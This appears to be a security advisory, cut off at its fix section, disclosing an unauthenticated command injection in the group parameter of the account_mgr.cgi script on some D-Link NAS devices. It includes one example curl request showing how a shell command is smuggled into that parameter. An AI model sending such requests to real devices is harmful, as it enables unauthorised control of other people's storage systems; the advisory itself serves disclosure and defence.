Overview

A command injection vulnerability has been identified in the account_mgr.cgi URI of certain D-Link NAS devices. Specifically, the vulnerability exists in the handling of the group parameter used within the CGI script cgi_user_add command. This flaw allows an unauthenticated attacker to inject arbitrary shell commands through crafted HTTP GET requests, affecting over 61,000 devices on the Internet.

image.png

Affected Devices

Affected Components

The vulnerability is localized to the account_mgr.cgi script, particularly in the handling of the cgi_user_add command. The group parameter in this script does not adequately sanitize input, allowing for command execution.

CWE

CWE-77: Command Injection.

Exploitation

To exploit this vulnerability, an attacker sends a crafted HTTP GET request to the NAS device with malicious input in the group parameter. An example exploit request is as follows:

curl "http://[Target-IP]/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=%27;<INJECTED_SHELL_COMMAND>;%27" 

This curl request constructs a URL that triggers the cgi_user_add command with a group parameter that includes an injected shell command.

Actual Result

image.png

Fix Recommendation

To remediate this vulnerability, it is recommended that: